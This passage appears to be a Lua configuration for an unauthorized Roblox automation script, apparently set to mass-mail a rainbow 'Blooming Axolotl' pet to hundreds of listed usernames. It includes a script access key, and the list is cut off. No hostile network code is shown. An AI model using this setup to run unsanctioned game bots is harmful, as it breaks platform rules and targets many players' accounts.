script_key = "fpAiAhNtXhwOUUeKHzlHcvYOQHhsWSHN";
_G.DISABLE_OVERLAY = true
_G.GDRY_RUN = false
_G.GMAIL_ITEMS = {
["Blooming Axolotl"] = {Class = "Pet", Id = "Blooming Axolotl", Amount = 115, IsGold = false, IsRainbow = true, IsShiny = false},
}
_G.GMAIL_RECEIVERS = {
"OLIVER_Light30",
"XxEthanFoxxX2023",
"EchoJ3llyMast3r",
"EagleRiftFox",
"AlphaIce201960",
"XxSkyGalaxyRiftxX200",
"Hunt3rHawkV3nom",
"Byt3_Sonic2017",
"Aubrey_Sky60",
"LunaKnightHyper2013",
"XxAvaCraftStormxX",
"Vict0riaStar2024",
"Ril3ySkat3rStormy202",
"XxOlivia_LionxX2022",
"Gabri3lCooki3202196",
"GabrielCyberGhost64",
"HenryPixel40YT",
"Danc3r_Build3r52",
"Ev3lynMin3r78",
"StormyCrystalVoid",
"KnightW0lfPulse",
"BrooklynnLuckyHyp3r",
"GigaS0nicThund3r2008",
"ZapCraftStar30",
"AlphaThunderCookie",
"Power_Phoenix40",
"ZoomVenomHero2003",
"BearPrimalSky",
"CrazeKnight2005YT",
"XxCrystalStormGigaxX",
"HannahSonicStealth20",
"XxPrimalB3arxX2018",
"XxFuryMysticLegendxX",
"JulianStreamCookie20",
"SparklySaberViper_YT",
"XxGlitchGold3nRogu3x",
"Mas0nKnightAqua2018",
"SparklyMagic64",
"VortexDriftDawn",
"Michael_Builder42",
"BlizzardNightShadow",
"Cart3r_Aqua2022",
"Addis0nStream2016YT",
"StarWraithGolden",
"EthanBlazeSkater2023",
"ChaseSlimeC00kie",
"XxBlast_SlimexX57",
"Mia_F0X41",
"Al3xand3r_Vip3r2010",
"ViperOmega72",
"XxNoraFlashxX68",
"SlimeJellyMiner2020",
"AquaJelly201670",
"HeroChillChase2003",
"ShadowLucky2024YT",
"CookieChill49",
"Xx_Pix3lat3dZapCha0s",
"FlashChas3Rift",
"Pr0R0cketStarry",
"CarterIceJelly",
"Chloe_Dragon82",
"LunaDancer81",
"BANE_Hunter12",
"CircuitThunderWolf20",
"IceRiftSonic",
"DancerPixel200434",
"ViperFlick200789",
"ChillHero200480",
"XXSTREAM_SparkxX43",
"XxPixelMinerCodexX58",
"XxRiftChillToxicxX",
"AmeliaNeonDrift",
"Ow3nHunt3rVort3x2017",
"Aid3nStr3amZ3r0_YT",
"SkyM00nSparkly",
"Bac0nHazeSt0rm2015",
"XxInf3rnoToxicTig3rx",
"HunterFlashR0cket",
"BlastClaw55",
"Cart3rPro54",
"Aur0raDarkClawYT",
"Xx_RiderLightCircuit",
"SkaterEch0Starry",
"B3AST_Echo22",
"ThunderVoid28",
"XxOrbitKnightDragonx",
"XxV0rtexTurb0Builder",
"WyattPulse96",
"IsaacHyp3rDuck",
"StarCrystal202154",
"XxGabrielBeastMoonxX",
"Jax0nBane64",
"Frost_Cookie2017",
"Aiden_Stealth2014",
"BrooklynnEagleDrift2",
"XxBladeTurboxX2018",
"EliRiftHazeYT",
"WraithBladeFury_YT",
"Sebastian_Zap68",
"B3arP0w3r2011",
"NoahSparkly35",
"JaxonJellyQueen",
"NinjaChaseByte",
"HazelDuck89",
"B3ar_Min3r46",
"GraceSaberZoom2004",
"NoahStormPuls330",
"ToxicDawnWraith",
"XxGigaPrismxX17_YT",
"Raven_Orbit73",
"StormyHunterRocket",
"Mas0n_Panda50",
"Z00m_Fury200731",
"HawkAceBlast62",
"PIXEL_Dark18",
"XxTurbo_Pix3lxX78",
"Brooklynn_CRAZ320177",
"ZeroStormVenom",
"StreamFusion28",
"WraithRocketByte",
"GoldenNightBlaze",
"HawkZ3r02013YT",
"PandaFir3Gold3nYT",
"XxMichaelMagicFirexX",
"HeroCrazeShadow",
"XxEzraWolfxX63",
"SaberThunder202212",
"EmmaTigerOmega2005",
"PhoenixCrystalTiger",
"Turbo_Phoenix2021",
"XxLaylaDawnxX53",
"PaisleyDarkBuilder",
"XX_CookieDragonQueen",
"MaxCodeClaw2002YT",
"IsaacShad0w2020",
"Inf3rn0Rift52",
"Dark_Eagl32006",
"Z0e_Her0201999",
"RAVEN_Craft202014",
"XxHannah_Ech0xX20102",
"Vip3rGhostZap2002",
"EpicPlayzCookie2011",
"UltraPix3lFlash2019",
"Fir3_Primal2018",
"XxLionRiderxX70",
"StarDuckArrow",
"LucasZeroLight78",
"XxZoe_MoonxX88",
"AbigailBlazeCookie",
"GlitchSilver17",
"Br00klynnZap24",
"Ash3rGold3nSlim3",
"Pixel_Cyber201652",
"Ech0StarryHawk48",
"AQUA_Lucky2023",
"Xx_Mat3oPix3lat3dMin",
"S0phia_R0gue2019",
"BlockPulseStorm",
"HazeT0xic61",
"AddisonCodeVortex201",
"EllieToxicUltra2018",
"Miner_Byte17",
"Moon_Turbo2004",
"CodeGalaxy34YT",
"FuryT0xicPanda",
"FusionCrazeThunder",
"IsabellaProDuck",
"Hunter_Galaxy202261",
"JaydenVenom73",
"XxWraithPrismSkaterx",
"GabrielMagicBuilder",
"XxGraysonThunderVort",
"XxWyattBuild3rxX27",
"XxPr0T0xicxX2006_YT",
"Xx_SparklyBuilderSte",
"XxFlash_StormxX2020",
"GalaxyJellyMiner",
"XxAddisonMast3rxX201",
"JacksonCooki32009",
"Turb0M00n70",
"KnightRogueLion",
"XxHannahTurboxX2013",
"Phoenix_Shadow2022",
"Ice_Sparkly33",
"StealthGlitch78",
"R0gu3Turb0201962",
"Builder_CHAOS26",
"Inf3rn0_Puls32015",
"LaylaRiftMoon",
"LuckyJelly202136",
"ChillB3arL3g3nd",
"PrismBearAquaYT",
"XxHunterBladexX2012",
"WraithSparkly200647Y",
"XxGigaPow3rxX201337",
"LIAM_Drag0n201732",
"FlameT0xic2018",
"MagicStormVort3x",
"CyberBladeStarry",
"Lava_Drift79",
"CraftWraithBacon",
"Pix3lat3dToxicMax",
"XxSilverSparkxX2023",
"EmmaSkaterHero",
"XxDawnV0rt3xxX2018",
"XxNovaLuckyxX2019",
"Zo3CircuitStarry",
"ChillGalaxy80",
"EliNightCod32011",
"SebastianZapToxic",
"StarryLionNinja",
"Xx_VICTORIAMAGICVIPE",
"Circuit_Golden2023YT",
"XxGhost_B3astxX2002",
"SamuelMagic29",
"PlayzHaz3202489",
"Jayd3nByt32009",
"Wolf_Omega77",
"Samuel_Fox200878",
"Thunder_Jelly200623",
"XxHazelBearxX2024",
"Cod3Blad317",
"Sky_Gh0st72",
"Liam_Pixel66",
"IsaacVip3rFlash45",
"XxGalaxy_HUNTERXX99",
"ArrowBlade62",
"StarChase2014YT",
"H3roCyb3r95YT",
"V0rtexPixel2013",
"Jayd3nCircuitKnight2",
"AmeliaAce200857",
"Fr0st_Max2007",
"RiftStreamRider2014",
"PixelEchoInferno",
"XxWyattDriftFusionxX",
"AceSkaterShad0w",
"BuilderNovaPulse",
"Viper_Nova202371",
"XxLight_ZeroxX34",
"XxMagic_DriftxXYT",
"ArrowFlam3Playz",
"XxMin3rNightxX2015",
"XxEmmaEchoGoldenxX",
"XxOlivia_Z00mxX2009",
"KingPanda87YT",
"LightLionBuilder2003",
"XxOrbit_SilverxX2016",
"DanielSkaterGhost",
"Turb0_Eagle2009",
"ChaosThunder2024_YT",
"F0xW0lf57",
"LUCKY_Neon2003",
"Abigail_Cookie201117",
"Cyb3rB3arYT",
"XXCYBERCRYSTALXX47_Y",
"XXLUCKY_EchoxXYT",
"SophiaRiftCraft73",
"MaxFrost200211",
"XxPlayzMinerxX2016",
"Jax0nOrbit2024",
"BlizzardChaseVoid",
"Xx_OmegaPixelatedVip",
"Turbo_Moon33",
"XxNoraSilverxX82",
"Eagl3Primal202061",
"SkyClawStarry2018",
"EliRocketSpark2006YT",
"BlizzardZ00mRaven200",
"SonicClaw201958",
"SlimeFox24YT",
"Block_Toxic45",
"Xx_PaisleyDriftBlock",
"Luna_Haze19",
"XxRiftCha0sxX2017",
"Flash_Dawn39",
"Drag0nNe0nBane2023",
"AbigailDanc3rMystic",
"V3n0mB3astFusi0n",
"JaxonSilver22_YT",
"Fox_ZOOM13",
"Elijah_Bear28",
"Fusion_Cod369",
"Jayd3nSky50",
"MOON_Blast202117",
"XxGh0stStealthxX2012",
"OrbitR0cketPlayz2005",
"Mateo_Queen2020",
"ZapG0ldenF0x",
"PixelV0rtex200936",
"William_Fury79",
"CodeGamerFrost2002",
"Xx_Grac3Pho3nixBlock",
"Giga_Cookie90YT",
"StormyB3ast66",
"IC3_Dragon2018",
"XxPixelAquaxXYT",
"EthanZoomThunder84",
"EllieRider11",
"FlameChaos201326",
"Will0wHaz32009",
"EllaSkater50",
"PixelNightClaw_YT",
"Aur0raOrbit200460",
"MinerDawn202157",
"PrimalCyberNe0n2018",
"XxStarGigaPrimalxX",
"GlitchMasterEcho12",
"Fr0stMiner2006",
"ZapChillBlaz3",
"Rid3rCyb3rPho3nix",
"XxNoraAceBuilderxX20",
"AriaLuckyTurbo58",
"XxRiftLightPandaxX20",
"CodeGigaDawn",
"MasonClaw2022YT",
"Fusi0nEpicBlad373YT",
"LeviFireNeon",
"CircuitSkyLava",
"XxMinerTigerPixelate",
"NoraGoldenStarry2013",
"EllaSt0rmyBlaz32003",
"N0raPixel2023",
"Craze_Dark201962",
"PLAYZROGU3_YT",
"King_Ven0m2012",
"LegendG0lden2015",
"Addis0nT0xicBane",
"Fusi0n_LuckyYT",
"Circuit_Legend2008",
"VortexMasterMagic202",
"XxBlizzardEchoCircui",
"XxDarkIcexX2013",
"PrimalCraz32012",
"CrazeProHero",
"Queen_Pulse64",
"XxSkyDancerxX2012",
"HENRY_Flick",
"EllaMaxInferno65",
"XxVoidDriftCodexX200",
"OmegaQueenGalaxy",
"XxLunaLegendSilverxX",
"XxStealth_ZoomxX74",
"POWER_Giga2004",
"Xx_AbigailV0idHunter",
"OliviaSlimeEcho",
"AddisonBladeInferno",
"HawkRocketThunder90",
"L3g3ndSkat3r200480",
"Craft_QU33N201949",
"ChillHeroPulse",
"FusionPixelFury20148",
"Paisl3y_NIGHT2007",
"XxElijahGlitchStormy",
"GigaBlizzardBlock",
"WolfOrbitClaw2022",
"Sophia_Bear2012",
"XxCod3Qu33nSilv3rxX",
"H3NRY_Crystal2009",
"HazelNovaInferno2014",
"SparkCircuit79",
"LoganBearUltra2019",
"ZeroKingPulse",
"Ow3nNight2005",
"Saber_Max92YT",
"DuckChillRider",
"JulianF0x2015YT",
"Aur0raChillGh0st2012",
"XxInf3rnoB3astxX2004",
"LoganIceStorm13",
"HannahNovaStormy",
"Grace_Code201256",
"XxHunterC00kieNightx",
"CyberPulse45",
"GhostBlazeFlash54",
"LucasEagleSlime",
"AlphaNight2009YT",
"RileyLionMaster",
"HyperStorm200632",
"Panda_Epic31",
"XxCyber_AcexX201096",
"XxMasonShadowBytexX",
"AsherRogue34",
"XxBaneCircuitxX_YT",
"IceFr0stV0rtex",
"EzraStarryInferno",
"XxSparkLavaxX2011YT",
"AmeliaLion2021_YT",
"DarkEchoRav3n",
"KingThunderQueen2016",
"GhostMagicDancer2004",
"MiaGalaxyZoom2002",
"XxCharl0tteChillxX17",
"Eagle_Vortex96",
"Xx_MateoViperPhoenix",
"XxCircuitGoldenBacon",
"S3bastian_STR3AM35",
"EagleGalaxySt0rmy",
"XxEagleSkaterxX2008",
"XxV0idSkyxX2010",
"XxRavenNovaLegendxX",
"ZaydenVoid2002",
"Drag0nV3n0mChas32020",
"NoraHazeBuilder",
"EmmaUltraStream",
"S0phia_Playz25",
"CrazeSlimeArr0w",
"AriaEchoDark",
"MasonClawHunt3r2024",
"Starry_Pixelated2008",
"ToxicFire202022",
"EmmaG0ldenPlayz2022",
"KnightSilverF0x",
"Br00klynCircuit26",
"KnightPulseViper",
"CharlotteChillBlast1",
"Mat3oGhostRift",
"CrystalV0idPh03nix",
"XxSkyStealthxX2022",
"Fury_Rift202385",
"INFERNO_Sky200858",
"ChaosFrost201721",
"Luk3FoxL3g3nd",
"BladeNeon200620",
"ViperDarkHero",
"Paisl3yCrystal81",
"Xx_OLIVERPHOENIXPOWE",
"Will0wMasterOrbit202",
"Xx_FrostGold3nDanc3r",
"FlashSilver88",
"StarBlaz3LionYT",
"Ph0enixPrimalStealth",
"InfernoOrbitBacon",
"VoidJ3llyAlpha",
"ICE_King201623",
"MoonAqua34",
"XxEzraDarkSlimexX",
"AquaMagic201563",
"OrbitHyperSaber_YT",
"LegendOmega87",
"MagicFuryNova",
"NoahJellyGamer2014",
"PixelFury201140",
"MATEO_Venom200263",
"Tig3rCraftAqua",
"ProFoxCookie",
"OliviaWraithHaz3",
"SavannahOmegaIce",
"FusionRider201370",
"ToxicFlam32016",
"XxDarkKnightLuckyxX",
"ArrowSkater201618",
"AmeliaBlockStealth",
"XxGlitch_SilverxX20",
"LaylaFusionDrift",
"GabrielEagle70",
"Oliv3rBlaz32005YT",
"CraftZ3roStar",
"AidenEagleByte",
"XxClaw_ProxX74",
"XxLuckyPowerxX2005",
"EzraMagicWraith",
"XxSkyFusi0nBl0ckxX20",
"LAYLA_Fox2006",
"V0rtexRaven84",
"GraceFireMiner73",
"WillowHunt3rSpark",
"WillowBearHawkYT",
"L3viStormyChill",
"Elijah_Max44",
"WillowPowerBane",
"Dawn_Nova23",
"SaberRiftP0wer",
"EchoHyperGlitch",
"WyattEagle99",
"RavenCookieEpic",
"TurboStealthClaw2017",
"XxSavannahAquaxX2006",
"DuckCraftBlade",
"EllaCha0sPixelYT",
"ZoeMagic71",
"BaneOmega202227",
"MagicZoom61",
"Ash3rThund3r2022",
"EvelynSpark2016YT",
"CharlotteFuryClawYT",
"StreamCodeCraft10",
"HawkRiftFir3YT",
"EllaNinjaSkater",
"OrbitSkyMystic41",
"JAX0N_Fury2010",
"IceVen0m200533",
"Olivia_KING70",
"XX_Al3xand3rSab3rVoi",
"XxViperNeonxX41",
"Pr0Dark2010",
"TOXICBUILDERSTORMY_Y",
"SparklyZeroRider",
"HenryBlizzardBeast",
"BlizzardWraith2022_Y",
"SkyCraftFusi0n",
"XxShad0wMinerxX68",
"Tig3r_BUILD3R2018",
"StormyHero201650",
"Code_Light16",
"Mia_Fr0st2002",
"Blad3Vort3xBan3",
"PandaBearGhost94",
"XxAcePrimalChaosxX",
"JulianLavaGalaxy",
"EpicSparklyArrowYT",
"ZoeKnightPhoenix2008",
"XxWill0wOrbitxX2013",
"CircuitOmegaBane2013",
"DuckStormyEcho",
"PrismFox53",
"AsherWraithHyper",
"GAMER_Night2015",
"LiamShadowSpark20206",
"HannahF0xEpic",
"WraithPix3lat3dCryst",
"Xx_CircuitShadowDrif",
"L0ganAquaTiger2006",
"T0xicCyberEpic201793",
"XxViperMoonxX2008",
"MysticEcho70",
"Ph0enixIceChill",
"XxZ00mGamerTurb0xX28",
"CyberFlameNinja59",
"C00ki3_F0x2007",
"WolfMaxSonic",
"BeastMysticPanda2011",
"HenryCraftNight",
"Gh0st_Spark63",
"Zayd3nZapChill",
"VoidNinja202457",
"FuryVenomCookie",
"Li0nN0va2007",
"HawkArr0w26",
"Arr0w_R0gue96",
"Dani3lFlashEagl32004",
"JamesCodeRocket42",
"Carter_HERO200632",
"Puls3R0ck3t200726",
"L3viKingThund3r",
"WyattUltra200585",
"Rav3nOm3gaNight73",
"GhostBane28YT",
"Bl0ckClawM00n2023",
"Ic3Qu33nN3on",
"OmegaJellyPanda2020",
"IsaacRogue51",
"Xx_ThunderCookieHaze",
"HawkHyper85",
"EllieHunter2009YT",
"RIFTAQUAMOON_YT",
"Ow3nMoonStormy52",
"B3arLionAlpha",
"Gabri3lGiga201663",
"Inferno_Storm87",
"GamerSaberPixel84",
"DragonCrazeEagle2003",
"StreamBlockHaze",
"BeastHyperClaw2011",
"Beast_Void33",
"BlazeBearHer0",
"Xx_SebastianCircuitJ",
"JamesFireLion",
"Sparkly_Jelly94",
"EliMast3r202395",
"Gabriel_Vortex27",
"CircuitBlaze41",
"ViperPrimalPh0enix",
"Chas3_Qu33n22",
"XxLeviProLuckyxX",
"MysticZer047",
"DragonBaneBlast",
"J3llyFrostZoom",
"Beast_Builder92",
"AquaMasterSaber",
"XxDanielMinerSparkly",
"XxBuilder_ProxX20111",
"StealthHeroLion",
"XxZeroMysticxX38",
"ElijahPow3rPrism2014",
"Charlott3Ninja_YT",
"SebastianZapFusion20",
"Grays0nDark64",
"XxLaylaFrostxX2013",
"Olivia_Blaz3201470",
"PaisleyPr0201623",
"HyperC0de201714",
"Flam3TurboRift",
"XxStarZoomEaglexX",
"NoahCod338",
"SamuelBlazeDancer201",
"Chas3CircuitPanda",
"Jacks0nBane2004_YT",
"LavaBlast201437",
"MAGIC_Skater200327",
"Crystal_VORT3X2010",
"XxBearCyberPrismxX",
"XxPixelLionxX23",
"XxCrazeGlitchSlimexX",
"AriaH3roTurbo",
"Bear_Neon2012",
"PixelVoid58YT",
"XxAm3lia_L3g3ndxX14",
"GabrielGiga36",
"SkyR0cketBane",
"XxViperBlockxX68",
"Cha0s_PIXELATED2013",
"Build3rShadowBlizzar",
"RocketBlaze74",
"AquaMinerSky",
"PhoenixFusion80",
"XxAquaDawnxX2017_YT",
"AuroraSilverLava",
"CraftVenomPhoenix",
"XxZ0eHer0UltraxX",
"PhoenixBlazeSlime",
"LunaSonicSkater",
"BuilderTigerDark",
"PandaDancerWolf",
"TurboRogu338",
"H3roVip3rGhost",
"BrooklynnInfernoCode",
"B3astBlizzard2016",
"XxZer0EaglePh0enixxX",
"Crystal_Nova47",
"Gabri3lV3nomB3ar2010",
"DriftMagicVortex",
"XxMiaInfern0AcexX200",
"EVELYN_Moon200658",
"MasonToxicSlime_YT",
"LunaRider74",
"Cyb3rQu33nUltra",
"XxRavenEpicxX16",
"Zayd3nV3n0mFir3",
"GamerCodeWolf",
"ByteBearPrimal",
"Vict0riaN0va26",
"XxHarperMinerxX2004",
"XxAquaDrag0nxX2018",
"Isabella_Ace95",
"StealthClawFlash",
"PrismInf3rn02023",
"BlazeHawk38",
"DawnBlockLion2010",
"Hyp3rOrbitWraith",
"XxHazelZeroMaxxX",
"XxNora_LEGENDXX2007",
"NoahZapSky",
"SamuelZeroCrystal",
"Michael_Star201412",
"PlayzMasterVortex201",
"ZaydenStreamCode",
"Pow3rVoidChill",
"Liam_Silver42",
"EllaEagleLava2003",
"DarkHaz378",
"HannahPrismShadow",
"Isab3llaToxic77",
"CraftSkaterPrimal202",
"PrimalPro201550",
"ChillPrism74YT",
"HunterZeroWraith2023",
"JulianArrow41",
"Jayd3nSilv3rDawn",
"Zo3NightFuryYT",
"WraithByt3B3ar",
"Sky_CIRCUIT80",
"XxToxicDancerLionxX2",
"XxMiaIcexX2015",
"StormDanc3rUltra",
"Chl03B3astCyb3r",
"Bac0nNinja2002",
"EvelynBl0ckTiger",
"Venom_Rider2006",
"AidenFlameBlast35",
"StarrySkySlime_YT",
"Shad0wAqua_YT",
"BlizzardBuild3rV3nom",
"SavannahLightRider",
"William_Golden2002YT",
"GamerPandaCyber",
"KayleePrimalChase200",
"LeviLionInferno27",
"ChloeBlazeArrow",
"StealthPower23",
"Gold3n_Vort3x2012",
"Knight_Circuit53",
"Om3ga_Ghost2008",
"Inf3rn0Drag0n2024",
"Xx_RogueThunderChill",
"Ash3rJ3lly201341",
"NightHeroCrystal90",
"AbigailBlazeUltra202",
"Echo_Fusion98YT",
"Her0PixelatedBlaze20",
"LunaWraithThund3r",
"XxNightSlim3HawkxX20",
"SparkBlockZap",
"XxEagleDarkFirexX",
"Grac3Moon200625",
"JaydenCyberCrystal20",
"Silv3rAc3Rift",
"RocketZoomLion",
"Bac0nSparkly89",
"James_Power201734",
"NoraLion77",
"Evelyn_Wraith202489",
"Slim3Craz318",
"XxMysticRiderxX30",
"MaxLi0nMagic201427",
"MateoDancer88",
"AddisonSilver93",
"ZoomChaos32",
"EllaMagicGolden20037",
"DragonBuilder200524",
"NeonZero52",
"Owen_Bane201076YT",
"Bl0ckSilver2014",
"Addis0nByte74",
"QueenWolfLegend2004",
"Master_SILVER76",
"XxSkyPowerProxX",
"ViperPrimal201274",
"XxFoxRogueHunterxX",
"VictoriaChaos48",
"Builder_BLAST20",
"C00ki3V0id2012",
"MasterMoonDragon",
"Chill_Ace2013",
"AriaVoidChaos",
"XxPixelatedSkaterSto",
"AbigailCyber202030",
"NeonRavenPanda",
"BrooklynnGolden51YT",
"XxMateo_POWERXX2002",
"Gh0stStreamZer098",
"XxSilverTigerMoonxX2",
"F0xDrag0nLegend",
"JaxonDawnWraith",
"Ban3ZapR0ck3t",
"XxLunaMin3rAc3xX2005",
"NoraDawnPulse96",
"RiftPowerLava2010",
"Z03Li0nC0d32003",
"Puls3Cyb3r24",
"Charlott3_Nova2002",
"J3lly_Blast65",
"LoganStreamCircuit20",
"PRIMAL_Haze92",
"KayleeIce68",
"XxAur0raP0w3rxX_YT",
"VictoriaCookiePro",
"XX_LegendHunterMysti",
"Xx_DanielGlitchBeast",
"Pixel_Dawn93",
"PowerChase200385",
"PIXELATED_Max45",
"SONIC_Omega201610",
"CookieUltraAlpha",
"Grac3RiftPix3l2016",
"NovaTigerEpic",
"XxRiderFrostxX2015",
"XxGraceTurboLegendxX",
"XxZ3roToxicHawkxX",
"PlayzShadow24",
"H3nry_Skat3r201159",
"ProPixelatedLegend",
"AddisonCraft200265",
"St0rmDancer2011",
"GlitchAqua2020YT",
"LucasKing201185",
"Lucky_Ph0enix2009",
"Mason_Build3r2005",
"ChillFireDancer",
"Zap_Magic16",
"XX_HunterCookieGalax",
"PrimalBuilder37",
"HarperSkyTurbo2023",
"XxOliverLegendxX2012",
"XxAl3xand3rBlastSilv",
"GlitchChillFlash",
"Starry_Spark20",
"BladeRocket201175",
"XxChaosNightxX11",
"CookieJellyGolden_YT",
"LavaHeroChill2009",
"Fusi0nSt0rmyMiner202",
"CyberFr0st41",
"Hyp3rMagicH3r0",
"Xx_KnightDragonBlaze",
"BrooklynnRift96",
"LightL3g3nd201688",
"XxAubreyFireBlizzard",
"Aria_Zero2010",
"RiderChasePrimal2009",
"LucasNinjaChase2023",
"Mat3oSt3althDark21",
"Rid3rSonic2024",
"BaneLionRider",
"LuckyPhoenix201792",
"XxAmeliaDrag0nxX75",
"ZeroNightRift87",
"Eagle_INFERN02012",
"Xx_EpicHunt3rSt3alth",
"Eagl3NinjaRid3r",
"V0idG0ld3n2004",
"WilliamDuckCircuit20",
"PowerVortexToxic2023",
"DuckB3ar2006_YT",
"V3nomVip3rOm3ga",
"PrismDancerVoid",
"TigerPlayzLava",
"XxLightM00nxX2012",
"Z3roGold3n2013",
"XxLunaArrowxX2010",
"P0WER_Master2022",
"XxStarBlastxX202419",
"Julian_Pulse34",
"H3roDanc3rRid3r",
"SonicPixelatedCode",
"JulianMax80YT",
"Thund3rByt352",
"GalaxyGh0st49",
"V0RTEX_Max27",
"ArrowCyb3rCooki3",
"Xx_NinjaWraithFusion",
"HunterCookieSpark201",
"ProCrazeCraftYT",
"Br00klynnL3g3ndEagl3",
"Rav3n_Sky2011",
"PRO_Skater2016",
"Byt3Vort3xMagic2009",
"Pix3lFuryUltra",
"DancerCodeStormy_YT",
"XxLuckyAlphaxX2011",
"LionCircuit39",
"S0nicPix3l37",
"Xx_THUNDERQUEENFROST",
"Jax0nC0deDuck",
"Epic_Aqua2010",
"OrbitSky90",
"XxLucasCircuitSparkx",
"ViperGoldenFlash",
"TurboDragon202441_YT",
"EchoHunt3rDanc3r",
"Bac0nHunter28",
"MagicGam3rEch0",
"Kaylee_Ech074",
"XxAsh3r_Inf3rnoxX49",
"BuilderPrismCyber",
"Jacks0nQueenNinja201",
"Harp3r_Rock3t2011YT",
"Will0wNe0n63",
"VoidFuryWraith",
"XxMat30_R0ck3txX",
"Savannah_SABER23",
"Lion_Hunter2013YT",
"SlimeBuilderClaw_YT",
"JackSparklySt0rmy200",
"XxChl0eEch0ViperxX",
"EpicMoonCod3",
"PrimalGold3nGlitch51",
"JaydenFlashSaber",
"VoidN3onBuild3r19",
"Stormy_KNIGHT28",
"XxEliStreamPlayzxX20",
"Xx_DragonToxicPix3la",
"RiftBlastFox2012",
"GigaLight201079",
"ZeroClawSparkly",
"Hyp3rDuck33",
"OliverLion85",
"CraftBearKing",
"SebastianPrism50",
"IsabellaSkater17",
"AceVen0m57",
"Panda_Craz32014",
"XxNora_VENOMXX2010",
"Zoe_Dark2022",
"Rav3n_Giga2013",
"WilliamBlade2003YT",
"Om3ga_Cod324",
"Aria_Fusion2005",
"Panda_Venom81",
"DriftBlaze47",
"BlockFuryRogu3",
"BlastDragonToxic2021",
"MichaelMasterStar42",
"VenomGoldenInferno",
"Arr0wBear2002",
"UltraFr0st49",
"XX_EchoPixelatedSlim",
"JackBuilderOrbitYT",
"AmeliaGigaQueen",
"XxSlimeBuilderInfern",
"XxRileyCookiexX20072",
"ToxicEcho2014_YT",
"Chlo3Pow3rNinja",
"Ash3rProRid3r",
"XxLionNeonChaosxX202",
"XxSt3althPh03nixSkat",
"XxEzraLegendCyberxX",
"EzraShad0w22",
"Bacon_Fir32008",
"HawkHunt3r2005",
"FlashFusi0nKnight",
"Pix3lZapSab3r27",
"FIRE_Echo2011YT",
"XxJellySparklyDarkxX",
"Thunder_Ghost2008",
"MysticCookieBlizzard",
"S0nicPixel74",
"M00nR0ck3t2002",
"Arr0wBladeMiner",
"Prism_Ultra24",
"Hawk_STAR2020",
"ClawPix3lNight39",
"CarterBytePower",
"MaxVip3rPix3lat3d",
"LegendEchoWolf12",
"Mia_ROCKET202251",
"EagleAceAqua",
"XxSparkUltraCircuitx",
"IsaacMagicRift30",
"CrystalUltraDark",
"Ne0n_MinerYT",
"Oliv3rArrowOm3ga2011",
"XxEchoCraftxX87",
"IceBlastOmega",
"Zap_Flash21YT",
"Alexander_Ech054",
"StealthZero61",
"DanielPhoenix42",
"AddisonKnight39YT",
"James_Bl0ck93",
"Pow3rB3arSky",
"Levi_ROGUE2008",
"BlazeMaxBuilder",
"Will0w_Ech0200368",
"Om3gaRift96",
"FlameAlphaBlizzard",
"EliGalaxyFury2006",
"Pow3rDuck2017",
"Raven_Pixel200967",
"FireCodeLion2009",
"ElijahFusionStream20",
"KnightChaseShad0w201",
"CharlottePixelDuck",
"Scarl3tt_Giga",
"IsaacEcho202010",
"CraftBaconPow3r",
"PrimalNinja11",
"Ph0enixGh0stBane2019",
"LiamGigaDrift",
"Li0n_Master201193",
"Charlott3_Ac32011",
"XXVORTEX_ZeroxX2006",
"EmmaSkat3rC0d3",
"AlphaSkat3rSpark",
"DanielStealthHero200",
"AuroraGam3rAlpha",
"GoldenDawnSkater",
"XxGrac3Li0nxX2010",
"NovaRav3nCyb3r",
"JellyStarry68",
"DanielMasterBlast",
"GamerLi0nUltra66",
"StarryGold3n2003",
"XxBlizzardPixelDarkx",
"Luke_S0nic201061",
"CodeClaw201759",
"CrystalVortexStormy",
"J3llyFuryOrbit2015",
"Om3gaSkyCircuitYT",
"XxDrag0nG0ldenxX62",
"LucasCraftFury",
"RiderFuryFlash",
"MasonSaberRocket",
"CraftBlazePanda",
"SkyRav3n39",
"XxLevi_HunterxX2018",
"IsabellaCyber2022_YT",
"V0idFlam32018",
"RiftB3arGhost2015",
"PrismGiga81",
"SlimeDuckSonic",
"Grac3_Z3ro52",
"Hyper_Queen201877",
"AmeliaDragonVoid",
"LightGh0stStar2004",
"IsabellaBlockBuilder",
"Mystic_Skater200225",
"Thund3rEpicBan3",
"SamuelOmegaQueen",
"Luna_Cookie2002",
"GigaCircuitMoon",
"Block_Drift23",
"MichaelLegendAlpha_Y",
"Abigail_Circuit63",
"OliverBeastSlime",
"Z3r0Craft28",
"Michael_Fusi0n2015",
"AquaCrystal17",
"XxNoraZeroxX2023",
"InfernoEcho200522",
"XxCrazeUltraLavaxX",
"BrooklynnMinerToxic",
"C0deKnightCyber2006",
"HannahMinerPrimal_YT",
"Blizzard_HUNTER2006Y",
"CookieSilverEcho71",
"Li0n_W0lf11YT",
"KayleeFireVortex2018",
"XxHeroProFoxxX",
"Rid3rDanc3r2020",
"AuroraHeroArrow20212",
"LaylaWraith42",
"LightMagic201280",
"RileyPrimalInferno",
"ToxicInfernoEcho2004",
"EllaDragonStormy2006",
"JaydenLavaPixelated8",
"ZapNinjaEpic",
"MateoNeonHunter2014",
"Mat30Rav3nN30n",
"XxWillowStreamxX2008",
"AM3LIA_B3ast54",
"Aubrey_Skater200892",
"ZeroJellyCraze",
"ElijahBane25YT",
"GraysonCircuitMoon20",
"ThunderFireGhost",
"XxOmega_SaberxX2013",
"PlayzRogue83",
"SlimeInfernoOmega",
"ThunderAce202146",
"DragonCraftSlime",
"Isaac_Arrow44",
"XxC0deRiderOmegaxX",
"CODE_Ace87",
"XxGabrielUltraxX73",
"Addis0n_Craft96",
"CHLO3_Sab3r2016",
"XxBearThunderFusi0nx",
"ViperQueenGalaxy",
"Ne0nLegendEpic",
"Ice_Queen200254",
"MiaBlade71",
"LunaStarryRocket",
"RiderEagleTiger2017",
"AceStealthIce",
"LukeFuryHeroYT",
"EagleBlaze72",
"ProFire202242",
"TurboKingGolden20023",
"CraftAquaMystic",
"XxSamuelLavaxX99",
"AubreyEch0Ven0m2011",
"XxOmegaStarAcexX95",
"EzraSonic2014_YT",
"BaneStarryIce",
"Hyp3rFusionNinja25",
"FoxFlameChase",
"Sonic_Chill",
"NinjaTurboGalaxy",
"Pr0Jelly2004",
"RiftPrimalEagle2007",
"BlastArr0wHawk",
"AlphaAquaUltra2010",
"Inf3rnoMaxCraftYT",
"PlayzOm3ga46",
"ZoomShadowQueen2021",
"Paisl3yHawk93",
"EchoGlitch202212",
"Hunt3r_Danc3r66",
"OwenKingLion",
"AriaRiftLegend34",
"FlameSilver56",
"OLIVIA_Orbit98",
"LightCha0s202288YT",
